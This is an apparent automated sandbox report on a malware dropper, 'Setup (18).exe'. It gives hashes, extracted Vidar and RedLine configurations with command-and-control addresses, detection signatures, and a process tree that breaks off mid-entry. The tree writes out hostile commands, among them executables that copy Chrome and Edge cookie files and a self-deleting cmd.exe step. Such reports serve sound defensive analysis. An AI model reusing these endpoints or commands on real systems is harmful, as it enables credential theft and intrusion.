Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1329s
  • max time network
    1784s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-08-2021 13:45

General

  • Target

    Setup (18).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

vidar

Version

40.1

Botnet

921

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

redline

C2

193.56.146.60:51431

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

1

C2

37.0.8.88:32122

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 45 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 16 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1956
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2796
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2808
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          PID:2720
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:4040
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2556
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2544
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1420
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1244
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1076
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:396
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:336
                        • C:\Users\Admin\AppData\Local\Temp\Setup (18).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:764
                          • C:\Users\Admin\Documents\7WRwpBp9qfDdL5xbgQtM5P0n.exe
                            "C:\Users\Admin\Documents\7WRwpBp9qfDdL5xbgQtM5P0n.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3328
                          • C:\Users\Admin\Documents\3087AswP9qKFuutTEXYx4Dw1.exe
                            "C:\Users\Admin\Documents\3087AswP9qKFuutTEXYx4Dw1.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3844
                            • C:\Users\Admin\Documents\3087AswP9qKFuutTEXYx4Dw1.exe
                              C:\Users\Admin\Documents\3087AswP9qKFuutTEXYx4Dw1.exe
                              3⤵
                              • Executes dropped EXE
                              PID:4804
                            • C:\Users\Admin\Documents\3087AswP9qKFuutTEXYx4Dw1.exe
                              C:\Users\Admin\Documents\3087AswP9qKFuutTEXYx4Dw1.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5012
                          • C:\Users\Admin\Documents\TYkaZbLSJPs6MJCbClFlYoHL.exe
                            "C:\Users\Admin\Documents\TYkaZbLSJPs6MJCbClFlYoHL.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3884
                            • C:\Users\Admin\Documents\TYkaZbLSJPs6MJCbClFlYoHL.exe
                              "C:\Users\Admin\Documents\TYkaZbLSJPs6MJCbClFlYoHL.exe"
                              3⤵
                              • Modifies data under HKEY_USERS
                              PID:8308
                          • C:\Users\Admin\Documents\4IO3qhLdN1zdZt9OY3zicBxV.exe
                            "C:\Users\Admin\Documents\4IO3qhLdN1zdZt9OY3zicBxV.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2852
                            • C:\Users\Admin\Documents\4IO3qhLdN1zdZt9OY3zicBxV.exe
                              C:\Users\Admin\Documents\4IO3qhLdN1zdZt9OY3zicBxV.exe
                              3⤵
                              • Executes dropped EXE
                              PID:4976
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 1584
                                4⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1636
                          • C:\Users\Admin\Documents\fUnwOZe3_559_pla3w2Ps682.exe
                            "C:\Users\Admin\Documents\fUnwOZe3_559_pla3w2Ps682.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:2148
                          • C:\Users\Admin\Documents\ffq_MST6DVLmywISe6FC1sWu.exe
                            "C:\Users\Admin\Documents\ffq_MST6DVLmywISe6FC1sWu.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2320
                            • C:\Users\Admin\AppData\Roaming\7730409.exe
                              "C:\Users\Admin\AppData\Roaming\7730409.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1040
                            • C:\Users\Admin\AppData\Roaming\4581663.exe
                              "C:\Users\Admin\AppData\Roaming\4581663.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:4264
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:4792
                            • C:\Users\Admin\AppData\Roaming\5837794.exe
                              "C:\Users\Admin\AppData\Roaming\5837794.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5028
                            • C:\Users\Admin\AppData\Roaming\4110748.exe
                              "C:\Users\Admin\AppData\Roaming\4110748.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3364
                          • C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe
                            "C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2308
                            • C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe
                              "C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe"
                              3⤵
                                PID:1188
                              • C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe
                                "C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe"
                                3⤵
                                  PID:5932
                                • C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe
                                  "C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe"
                                  3⤵
                                  • Loads dropped DLL
                                  PID:1084
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\lsFPQh5r2CVoSw9KyBobhoAz.exe"
                                    4⤵
                                      PID:7828
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        5⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Drops file in Program Files directory
                                        PID:5464
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /T 10 /NOBREAK
                                        5⤵
                                        • Delays execution with timeout.exe
                                        PID:6640
                                • C:\Users\Admin\Documents\BvJGlbW1qGUt2IGqPWaeWU8W.exe
                                  "C:\Users\Admin\Documents\BvJGlbW1qGUt2IGqPWaeWU8W.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:804
                                • C:\Users\Admin\Documents\cminWsjXCHSS3hhtdRApDqij.exe
                                  "C:\Users\Admin\Documents\cminWsjXCHSS3hhtdRApDqij.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3992
                                • C:\Users\Admin\Documents\rxdtmwOhLBQMLbI6FgTRXtQq.exe
                                  "C:\Users\Admin\Documents\rxdtmwOhLBQMLbI6FgTRXtQq.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2516
                                  • C:\Users\Admin\Documents\rxdtmwOhLBQMLbI6FgTRXtQq.exe
                                    C:\Users\Admin\Documents\rxdtmwOhLBQMLbI6FgTRXtQq.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4864
                                • C:\Users\Admin\Documents\oa9GH9Nv0EIYczi2Xw4dIqb_.exe
                                  "C:\Users\Admin\Documents\oa9GH9Nv0EIYczi2Xw4dIqb_.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:900
                                • C:\Users\Admin\Documents\TdY2mtECBzjaOEZgqZiXmYYc.exe
                                  "C:\Users\Admin\Documents\TdY2mtECBzjaOEZgqZiXmYYc.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2528
                                • C:\Users\Admin\Documents\bcL1pVsOfzxFG1tRXLj_ePmC.exe
                                  "C:\Users\Admin\Documents\bcL1pVsOfzxFG1tRXLj_ePmC.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:860
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 660
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4624
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 696
                                    3⤵
                                    • Suspicious use of SetThreadContext
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2852
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 684
                                    3⤵
                                    • Program crash
                                    PID:1252
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 708
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5308
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1120
                                    3⤵
                                    • Program crash
                                    PID:1376
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 1112
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:4580
                                • C:\Users\Admin\Documents\_h5VHXvMINjZMfWJr7jBFcy7.exe
                                  "C:\Users\Admin\Documents\_h5VHXvMINjZMfWJr7jBFcy7.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of WriteProcessMemory
                                  PID:2948
                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4240
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4144
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:5132
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                        PID:4816
                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • Drops file in Program Files directory
                                      PID:4268
                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:4304
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                          PID:5632
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5256
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:904
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4184
                                        • C:\Windows\system32\WerFault.exe
                                          C:\Windows\system32\WerFault.exe -u -p 4304 -s 1548
                                          4⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:3908
                                    • C:\Users\Admin\Documents\2o2UxyyjKvD4Lp_eUf7CIzef.exe
                                      "C:\Users\Admin\Documents\2o2UxyyjKvD4Lp_eUf7CIzef.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:580
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 660
                                        3⤵
                                        • Program crash
                                        PID:4532
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 676
                                        3⤵
                                        • Program crash
                                        PID:1168
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 684
                                        3⤵
                                        • Program crash
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4532
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 640
                                        3⤵
                                        • Program crash
                                        PID:5140
                                    • C:\Users\Admin\Documents\81uDFTgip4RKovG2e8USk7uq.exe
                                      "C:\Users\Admin\Documents\81uDFTgip4RKovG2e8USk7uq.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:1216
                                      • C:\Users\Admin\AppData\Local\Temp\is-94EO0.tmp\81uDFTgip4RKovG2e8USk7uq.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-94EO0.tmp\81uDFTgip4RKovG2e8USk7uq.tmp" /SL5="$1027A,138429,56832,C:\Users\Admin\Documents\81uDFTgip4RKovG2e8USk7uq.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of FindShellTrayWindow
                                        PID:4136
                                        • C:\Users\Admin\AppData\Local\Temp\is-05469.tmp\Setup.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-05469.tmp\Setup.exe" /Verysilent
                                          4⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          PID:1540
                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Enumerates connected drives
                                            • Suspicious use of FindShellTrayWindow
                                            PID:4628
                                            • C:\Windows\SysWOW64\msiexec.exe
                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629387666 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                              6⤵
                                                PID:7412
                                            • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                              "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                              5⤵
                                              • Executes dropped EXE
                                              PID:5036
                                              • C:\Users\Admin\AppData\Local\Temp\is-C5IN4.tmp\WEATHER Manager.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-C5IN4.tmp\WEATHER Manager.tmp" /SL5="$1038A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of FindShellTrayWindow
                                                PID:5248
                                                • C:\Users\Admin\AppData\Local\Temp\is-RJSJJ.tmp\Setup.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\is-RJSJJ.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                  7⤵
                                                  • Loads dropped DLL
                                                  • Enumerates connected drives
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:6656
                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-RJSJJ.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-RJSJJ.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629387666 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                    8⤵
                                                      PID:4364
                                              • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:5220
                                                • C:\Users\Admin\AppData\Local\Temp\is-4BE5H.tmp\MediaBurner2.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-4BE5H.tmp\MediaBurner2.tmp" /SL5="$103F4,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:5488
                                                  • C:\Users\Admin\AppData\Local\Temp\is-QVNJK.tmp\3377047_logo_media.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-QVNJK.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                    7⤵
                                                      PID:5464
                                                      • C:\Program Files\Windows Defender Advanced Threat Protection\KJMNXLMYIG\ultramediaburner.exe
                                                        "C:\Program Files\Windows Defender Advanced Threat Protection\KJMNXLMYIG\ultramediaburner.exe" /VERYSILENT
                                                        8⤵
                                                          PID:7872
                                                          • C:\Users\Admin\AppData\Local\Temp\is-6PHTP.tmp\ultramediaburner.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-6PHTP.tmp\ultramediaburner.tmp" /SL5="$30512,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\KJMNXLMYIG\ultramediaburner.exe" /VERYSILENT
                                                            9⤵
                                                            • Drops file in Program Files directory
                                                            PID:7936
                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                              10⤵
                                                                PID:7184
                                                          • C:\Users\Admin\AppData\Local\Temp\7b-66d19-9b3-d38a2-18628c99ec8de\Qyxolusiwu.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\7b-66d19-9b3-d38a2-18628c99ec8de\Qyxolusiwu.exe"
                                                            8⤵
                                                            • Checks computer location settings
                                                            PID:7952
                                                          • C:\Users\Admin\AppData\Local\Temp\16-643a9-234-32d9f-cc291a33cf01d\Qozhuhotaewo.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\16-643a9-234-32d9f-cc291a33cf01d\Qozhuhotaewo.exe"
                                                            8⤵
                                                              PID:8040
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b2h5oc4v.nbe\GcleanerEU.exe /eufive & exit
                                                                9⤵
                                                                  PID:2964
                                                                  • C:\Users\Admin\AppData\Local\Temp\b2h5oc4v.nbe\GcleanerEU.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\b2h5oc4v.nbe\GcleanerEU.exe /eufive
                                                                    10⤵
                                                                      PID:8836
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\myuq0yak.hhh\installer.exe /qn CAMPAIGN="654" & exit
                                                                    9⤵
                                                                      PID:8432
                                                                      • C:\Users\Admin\AppData\Local\Temp\myuq0yak.hhh\installer.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\myuq0yak.hhh\installer.exe /qn CAMPAIGN="654"
                                                                        10⤵
                                                                          PID:9036
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k3rkaymm.0tc\ufgaa.exe & exit
                                                                        9⤵
                                                                          PID:8608
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jiiwjre.h5n\anyname.exe & exit
                                                                          9⤵
                                                                            PID:8236
                                                                            • C:\Users\Admin\AppData\Local\Temp\3jiiwjre.h5n\anyname.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\3jiiwjre.h5n\anyname.exe
                                                                              10⤵
                                                                                PID:8872
                                                                                • C:\Users\Admin\AppData\Local\Temp\3jiiwjre.h5n\anyname.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\3jiiwjre.h5n\anyname.exe" -q
                                                                                  11⤵
                                                                                    PID:4232
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k51yuuzh.s5w\gcleaner.exe /mixfive & exit
                                                                                9⤵
                                                                                  PID:6372
                                                                                  • C:\Users\Admin\AppData\Local\Temp\k51yuuzh.s5w\gcleaner.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\k51yuuzh.s5w\gcleaner.exe /mixfive
                                                                                    10⤵
                                                                                      PID:8304
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2dyt0xfz.zw0\autosubplayer.exe /S & exit
                                                                                    9⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5476
                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
